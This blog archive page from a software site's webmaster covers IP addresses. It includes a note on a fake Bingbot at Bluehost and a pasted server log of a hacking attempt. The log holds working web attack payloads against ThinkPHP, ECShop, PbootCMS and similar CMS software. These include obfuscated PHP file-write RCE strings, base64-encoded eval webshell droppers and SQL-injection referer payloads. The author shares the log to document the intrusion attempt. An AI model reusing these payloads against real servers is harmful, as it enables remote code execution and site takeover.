Category Archives: IP addresses

50.116.69.213 – Bingbot at Bluehost?

fake bots, IP addresses

For the last week I’ve been trying to get rid of various type of bad behaving bots visiting Freefixer.com. I have a small python script that will flag suspicious bingbots. The script detected 50.116.69.213:

50.116.69.213 - - [10/Sep/2019:20:43:53 -0700] "GET /freefixer.xml HTTP/1.1" 200 9808 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

As you can see, when I do a reverse IP lookup for 50.116.69.213 the returned hostname ends with .bluehost.com. 50.116.69.213 is clearly not a real Bingbot.

Typically I would block anyone falsely claiming to be a Bingbot. But given that it only polls FreeFixer XML PAD, it’s possible that 50.116.69.213 is running a software listing site. Setting the user agent to Bingbot could just be sloppy programming error. I will not block 50.116.69.213.

50.116.69.213 is located in Houston:

124.156.120.3 – Another Hacking Attempt

fake bots, hacking, IP addresses

Found another hacking attempt this morning when examining the access.log. I’ve pasted the requests from 124.156.120.3 below. It appears attempt to inject some PHP and SQL code. In addition 124.156.120.3 also identify itself as Bingbot, which obviously is not true.

124.156.120.3 seems to be assigned to Singapore Tencent Cloud Computing (beijing) Co. Ltd. It’s likely one of their customers that have been hacked. Here’s the location on a Google map:

124.156.120.3 - - [17/Sep/2019:14:08:53 -0700] "PUT //QqYN1A763TmozH0L.txt HTTP/1.1" 404 4221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[KxVHuP17U239lQyI]);{//../rss HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:56 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=53USa9rmzg916cmW.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:58 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f*ck%27]);&f*ck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "POST //index.php?s=index HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //d.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //user.php?act=login HTTP/1.1" 404 413 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:03 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:06 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

